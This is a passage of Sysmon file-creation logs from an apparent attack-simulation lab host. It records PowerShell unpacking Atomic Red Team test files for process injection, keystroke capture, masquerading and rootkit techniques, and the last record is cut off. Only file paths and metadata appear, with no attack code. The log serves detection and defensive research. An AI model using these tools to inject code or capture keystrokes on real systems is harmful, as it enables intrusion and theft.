{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4748,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:06.705\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1014\\bin\\puppetstrings.exe\r\nCreationUtcTime: 2020-08-01 07:59:06.705","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:06.705","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1014\\bin\\puppetstrings.exe","CreationUtcTime":"2020-08-01 07:59:06.705","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4749,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:06.799\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\r\nCreationUtcTime: 2020-08-01 07:59:06.799","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:06.799","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1027.004\\bin\\T1027.004_DynamicCompile.exe","CreationUtcTime":"2020-08-01 07:59:06.799","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4750,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:06.814\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\bin\\T1036.003.exe\r\nCreationUtcTime: 2020-08-01 07:59:06.814","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:06.814","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\bin\\T1036.003.exe","CreationUtcTime":"2020-08-01 07:59:06.814","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4751,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.ps1\r\nCreationUtcTime: 2020-08-01 07:59:06.830","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.ps1","CreationUtcTime":"2020-08-01 07:59:06.830","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4752,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.vbs\r\nCreationUtcTime: 2020-08-01 07:59:06.830","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.vbs","CreationUtcTime":"2020-08-01 07:59:06.830","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4753,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.830\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_test.bat\r\nCreationUtcTime: 2020-08-01 07:59:06.830","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.830","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_test.bat","CreationUtcTime":"2020-08-01 07:59:06.830","EventReceivedTime":"2020-08-01 07:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4754,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 07:59:06.908\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\bin\\T1055.exe\r\nCreationUtcTime: 2020-08-01 07:59:06.908","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 07:59:06.908","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\bin\\T1055.exe","CreationUtcTime":"2020-08-01 07:59:06.908","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4755,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:06.924\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\Win32\\T1055.dll\r\nCreationUtcTime: 2020-08-01 07:59:06.924","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:06.924","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\Win32\\T1055.dll","CreationUtcTime":"2020-08-01 07:59:06.924","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4756,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:06.924\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\x64\\T1055.dll\r\nCreationUtcTime: 2020-08-01 07:59:06.924","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:06.924","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\x64\\T1055.dll","CreationUtcTime":"2020-08-01 07:59:06.924","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4757,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.939\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.012\\src\\Start-Hollow.ps1\r\nCreationUtcTime: 2020-08-01 07:59:06.939","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.939","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.012\\src\\Start-Hollow.ps1","CreationUtcTime":"2020-08-01 07:59:06.939","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4758,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:06.955\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\Win32\\T1055.dll\r\nCreationUtcTime: 2020-08-01 07:59:06.955","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:06.955","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\Win32\\T1055.dll","CreationUtcTime":"2020-08-01 07:59:06.955","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4759,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:06.955\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\x64\\T1055.dll\r\nCreationUtcTime: 2020-08-01 07:59:06.955","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:06.955","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055\\src\\x64\\T1055.dll","CreationUtcTime":"2020-08-01 07:59:06.955","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4760,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.955\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\r\nCreationUtcTime: 2020-08-01 07:59:06.955","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.955","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1","CreationUtcTime":"2020-08-01 07:59:06.955","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4761,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:06.971\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x64.dll\r\nCreationUtcTime: 2020-08-01 07:59:06.971","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:06.971","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x64.dll","CreationUtcTime":"2020-08-01 07:59:06.971","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4762,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:06.971\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x86.dll\r\nCreationUtcTime: 2020-08-01 07:59:06.971","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:06.971","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\bin\\T1056.004x86.dll","CreationUtcTime":"2020-08-01 07:59:06.971","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4763,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004.sln\r\nCreationUtcTime: 2020-08-01 07:59:06.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004.sln","CreationUtcTime":"2020-08-01 07:59:06.986","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4764,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:06.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004\\T1056.004.vcxproj\r\nCreationUtcTime: 2020-08-01 07:59:06.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:06.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\T1056.004\\T1056.004.vcxproj","CreationUtcTime":"2020-08-01 07:59:06.986","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4765,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:06.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\Win32\\T1056.004.dll\r\nCreationUtcTime: 2020-08-01 07:59:06.986","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:06.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\Win32\\T1056.004.dll","CreationUtcTime":"2020-08-01 07:59:06.986","EventReceivedTime":"2020-08-01 07:59:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4766,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:07.002\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1056.004\\src\\x64\\T1056.004.dll\r\nCreationUtcTime: 2020-08-01 07:59:07.002","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 